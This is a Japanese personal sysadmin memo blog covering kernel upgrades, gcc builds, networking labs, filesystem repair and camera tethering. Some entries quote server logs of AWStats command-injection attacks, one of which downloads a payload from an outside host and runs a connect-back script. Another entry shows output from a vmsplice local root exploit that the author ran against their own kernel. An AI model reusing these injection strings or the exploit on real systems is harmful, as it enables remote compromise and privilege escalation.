僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。
大阪駅へ歩き、ことらぐのお茶会に参加。WineのHackerを囲んで WineやCodewaversの話題が咲き乱れていた。 回転寿司にスタバ。おまけにおでんをつまんで 乾杯。NTFSをmountするオプションに uid=NUM,gid=NUMがある 話を聞く。JMANに明記されていたことを後付けで知った。
変なログ。これは勘違いや嫌がらせではなかろう。
201.8.98.44 - - [12/Feb/2005:02:00:49 +0900] \ "GET /awstats/awstats.pl?configdir=|echo;%20echo;%20ls;%20echo;%20echo| \ HTTP/1.0" 404 472 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
まあ、此 に比べればまだ手ぬるいかも。
221 :212:05/02/05 01:26:39 ID:xJZHVJAK
スレ違いだけど、こんな感じでやられました。
"GET /cgi-bin/awstats.pl?configdir
=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%2066%2e90%2e116%
2e37%2fdc%2eexe%3bmv%20dc%2eexe%20love%2epl%3bchmod%20777%20love%
2epl%3bperl%20%2e%2flove%2epl%2069%2e158%2e57%2e20%2020001%3bid%
3buptime% 3becho%20e_exp%3b%2500 HTTP/1.1" 200 8 07 "-" "-"
222 :login:Penguin:05/02/05 02:00:34 ID:XQoynZ2n
>>221
AWStatsの脆弱性を突かれましたな。
アクセス解析ツールにバグ、人気Blogが改ざんの被害に
http://www.itmedia.co.jp/enter
qemuのBSDバトルは続く。。
OpenBSDのmake buildはまだまだ。
NetBSDはとっくにエラーを吐いて
止まっている。
追究は次回。
セキュリティホールmemoから
WinDbg入門に至る。
解説記事の
<Title>が
"コンピュータの基礎"
と書いてある。
安直にインストールして、適当にコマンドを叩く。そこまでしか、興味は持続しなかった。
追試。
デフォルトのカーネルをremovepkgで引っこ抜き、
installpkg kernel-2.6.23.16_plamoSMP-i586-P1.tgz
する。
/boot/vmlinuz (シンボリックリンク)の指す先
が変る。
$ ls -l kernel-2.6.23.16_plamoSMP-i586-P1.tgz -rw-r--r-- 1 user group 16404051 2月 12日 10:08 \ kernel-2.6.23.16_plamoSMP-i586-P1.tgz $ uname -a Linux plamo 2.6.23.16-plamoSMP #1 SMP PREEMPT Tue \ Feb 12 00:52:51 JST 2008 i686 unknown unknown GNU/Linux $ ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7e28000 .. 0xb7e5a000 [-] vmsplice: Bad address $
カーネルをアップデートする。dpkg -lで入ってるカーネルを調べて、
apt-get install -y linux-image-2.6-k7 とかやればいいらしい。
新しいカーネルがインストールされ、/boot/grub/menu.lst にもデフォルトのエントリ
に追記される。
再起動後、exploitを再度実行。これが限界。
lennyでは2.6.22-3-k7で対応されていた。
INSPIRON6000に入れてみた。
./confire --enable-bootstrap --enable-threads --enable-tls。
そして make CFLAGS='-O' LIBCFLAGS='-g -O2'
LIBCXXFLAGS='-g -O2 -fno-implicit-templates' bootstrap 。
例によって、読むべきものを読んでいない。
できたgccで、適当にコンパイルしてみる。
gcc-3.4.6より、少しオブジェクトが大きくなったかも。
$ gcc --version gcc (GCC) 4.2.3 Copyright (C) 2007 Free Software Foundation, Inc. This is free software; see the source for copying \ conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS \ FOR A PARTICULAR PURPOSE. $ ls -l exploit* -rw-r--r-- 1 user group 7655 2月 13日 09:08 exploit.c -rwxr-xr-x 1 user group 8349 2月 13日 09:09 exploit3* -rwxr-xr-x 1 user group 8523 2月 13日 13:21 exploit4*
空白の入ったファイル名が有効なことを確認。
とはいえ、禍の元であることは十分予想できる。
$ w3m -dump_head \ "http://www.kuzuore.com/misc/dust/white space.txt" HTTP/1.1 200 OK Date: Fri, 13 Feb 2009 02:56:40 GMT Server: Apache Last-Modified: Fri, 13 Feb 2009 02:48:24 GMT ETag: "140634-b-462c3dedcce00" Accept-Ranges: bytes Content-Length: 11 Connection: close Content-Type: text/plain Content-Language: ja X-Pad: avoid browser bug
dhcp サーバを立ててみる。
それからDNATもやってみた。LANの内側にhttp, ftp, smtp のサーバを立てて
別のLANの内側からNetを介して接続確認。このようなテストは、
仮想環境+バイナリパッケージの多いOSSが(環境を早く整えることができるので)
便利だ。
OBSがデフォルトで立てているtelnetとftp、永続的に消すにはどこを
書き換えるんだっけ。
あーめんど。
アドホックなIPv6も試みたが、なんかうまくいかない(Plamo-4.22でも同様)。
6to4ゲートウェイが中継してくれてないような気が。
家のルータをOBSにすげ替えてみた。
既存のサービスはうまくまわっているようだ。
# ip -f inet6 route show すると、unreachable ...がどっと出た。
さて、どうするか。
Class 4。
最初のRasPiと
ともにあった。
流石に今は、どうも起動できないっぽいので、e2fsckしてみる。
$ time sudo e2fsck -fpttvc /dev/sdb2
/dev/sdb2: Superblock has an invalid ジャーナル (iノード 8).
CLEARED.
*** journal has been deleted ***
/dev/sdb2: Superblock has_ジャーナル flag is clear, but a ジャーナル is present.
CLEARED.
/dev/sdb2: Updating bad block inode.
/dev/sdb2: ジャーナル iノード is not in use, but contains data. CLEARED.
/dev/sdb2: Duplicate or bad block in use!
/dev/sdb2: Multiply-claimed block(s) in iノード 8678: 922832--922835
/dev/sdb2: Multiply-claimed block(s) in iノード 21282: 605004--605005 605007 605124--605127
Pass 1b: Memory used: 2388k/536k (2229k/160k), time: 0.06/ 0.06/ 0.00
Pass 1b: I/O read: 63MB, write: 0MB, rate: 1132.58MB/s
Pass 1c: Memory used: 2388k/536k (2229k/160k), time: 3.37/ 0.03/ 0.09
Pass 1c: I/O read: 50MB, write: 0MB, rate: 14.83MB/s
/dev/sdb2: (There are 2 iノードs containing multiply-claimed blocks.)
/dev/sdb2: File ... (iノード #8678, mod time Sun Feb 9 08:05:01 2014)
has 4 multiply-claimed block(s), shared with 1 file(s):
/dev/sdb2: <The bad blocks inode> (iノード #1, mod time Thu Feb 13 09:11:05 2020)
/dev/sdb2:
/dev/sdb2: UNEXPECTED INCONSISTENCY; RUN fsck MANUALLY.
(i.e., without -a or -p options)
real 22m29.768s
user 0m0.679s
sys 0m2.921s
$ file InstallMacOSX.dmg InstallMacOSX.dmg: zlib compressed data
$ 7z e InstallMacOSX.dmg 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=ja_JP.UTF-8,Utf16=on,HugeFiles=on,64 bits, 8 CPUs Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz (806EB),ASM,AES-NI) Scanning the drive for archives: 1 file, 6204629298 bytes (5918 MiB) Extracting archive: InstallMacOSX.dmg -- Path = InstallMacOSX.dmg Type = Dmg Physical Size = 6204629298 Method = Copy Zero2 ZLIB CRC Blocks = 6162 Everything is Ok Files: 9 Size: 6812200960 Compressed: 6204629298
$ ls -alFh 合計 13G drwxr-xr-x 2 user group 4.0K 2月 13 13:28 ./ drwxr-xr-x 18 user group 12K 2月 13 13:29 ../ -rw-r--r-- 1 user group 512 2月 7 11:36 0.MBR -rw-r--r-- 1 user group 512 2月 7 11:36 '1.Primary GPT Header' -rw-r--r-- 1 user group 16K 2月 7 11:36 '2.Primary GPT Table' -rw-r--r-- 1 user group 3.0K 2月 7 11:36 3.free -rw-r--r-- 1 user group 200M 2月 7 11:36 4.C12A7328-F81F-11D2-BA4B-00A0C93EC93B -rw-r--r-- 1 user group 6.1G 2月 7 11:36 5.hfs -rw-r--r-- 1 user group 129M 2月 7 11:36 6.free -rw-r--r-- 1 user group 16K 2月 7 11:36 '7.Backup GPT Table' -rw-r--r-- 1 user group 512 2月 7 11:36 '8.Backup GPT Header' -rw-r--r-- 1 user group 5.8G 2月 7 11:36 InstallMacOSX.dmg
$ sudo mount -r -t hfsplus -o loop 5.hfs /media/temp/ $ ls -alFh /media/temp/ 合計 5.8G drwxr-xr-x 1 root root 5 10月 25 03:01 ./ drwxr-xr-x 8 root root 4.0K 10月 27 21:58 ../ dr-xr-xr-t 1 root root 2 7月 9 2016 '.HFS+ Private Directory Data'$'\r'/ -rw-r--r-- 1 root root 5.8G 10月 25 03:03 InstallMacOSX.pkg
一旦このくらいで。
仮想マシンに入れてみた。
ディスクをダウンロードする。
インストール自体は難なく終わる。
パッケージのインストール中、母機のCPUは少し熱くなった。
ファンを引っ張り出して下に敷く。パッケージのインストール中、母機のCPUは少し熱くなった。
あまり効き目のなさそうなファンを引っ張り出して下に敷く。
u無事にX(LXDE)
も起動し、ssh-keygen -t ed25519で鍵作成。
母機からイメージをkpartx してroでマウントしておいて、
キーをメールで送信する。あまりいい方法でもないが、
さしあたりここに送信するくらいはできた。
このブログも、Plamoで書いていると。
$ lsb_release -a LSB Version: unavailable Distributor ID: Plamo Description: Plamo Linux release 7.2 Release: 7.2 Codename: unavailable
この段階では、まだPlamoらしさはあまり見えてない。
gphoto2。
$ time gphoto2 --quiet --capture-image-and-download -F 5 -I 3 --filename "%S".png /capt0000.jpg /capt0001.jpg /capt0002.jpg /capt0003.jpg /capt0004.jpg real 0m13.687s user 0m0.088s sys 0m0.049s $ ls -l --full-time -h *.png -rw-r--r-- 1 user group 2.2M 2021-02-13 11:44:08.000000000 +0900 08.png -rw-r--r-- 1 user group 2.2M 2021-02-13 11:44:10.000000000 +0900 10.png -rw-r--r-- 1 user group 2.2M 2021-02-13 11:44:13.000000000 +0900 13.png -rw-r--r-- 1 user group 2.2M 2021-02-13 11:44:16.000000000 +0900 16.png -rw-r--r-- 1 user group 2.2M 2021-02-13 11:44:19.000000000 +0900 19.png
数が少ないのでファイル名は秒でごまかしたが、 1分以上に跨がれば、当然ダブって古いのは消える。
この場合はプログラムAEで1/200秒で、ほぼ指定間隔通りに撮れていたようだ。
シャッター音は必ずしも等間隔には聞こえなかったが。
このカメラでは、自動露出では3秒未満では間隔があまり揃わなかった。
露出とフォーカスをマニュアルにすると1秒でもできないことはないようだけど、
内部でファイル名が重なることがあるらしく、指定枚数より少ないことも
あった。
インターバルは1以上の整数しか指定できないみたい。
MicroSDの不良判定が痛い。PCで読み書きできてもD3400では 受け付けなかったり。
exif(1)で中のテキストを見ていながら、しばらくおかしいことに
気づかなかった。
ファイル名を "*.png" にしても、吐き出されるファイルは、
$ identify 02-13-13-48-06.png 02-13-13-48-06.png JPEG 2992x2000 2992x2000+0+0 8-bit sRGB 1.69576MiB 0.000u 0:00.004
$ time gphoto2 --quiet --capture-image-and-download -F 10 -I 1 --filename "+%m-%d-%H-%M-%S".jpg
撮った10コマをmencoderで動画にする。1.5fpsくらいが適切か。
ちょっとピンぼけだけど、マニュアルの1/20秒で、わりと正確に一秒ひとコマ撮れてるように見えた。表記がどこまで正確なのかはわからないにしてもだ。
ついでに
exifも。
リンク先がUTF-8(LF)テキストだと、文字化けするようだ。
firefoxもgoole chromeも同様。
/etc/apache2/conf-enabled$ grep char * charset.conf:# Read the documentation before enabling AddDefaultCharset. charset.conf:# AddDefaultCharset UTF-8
AddDefaultCharset UTF-8 のコメントを外し、systemctl restart apache2。
$ find . -type f -name '*.txt' -exec nkf --guess {} \; | grep -c "2022\|EUC\|Shift
1246
リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。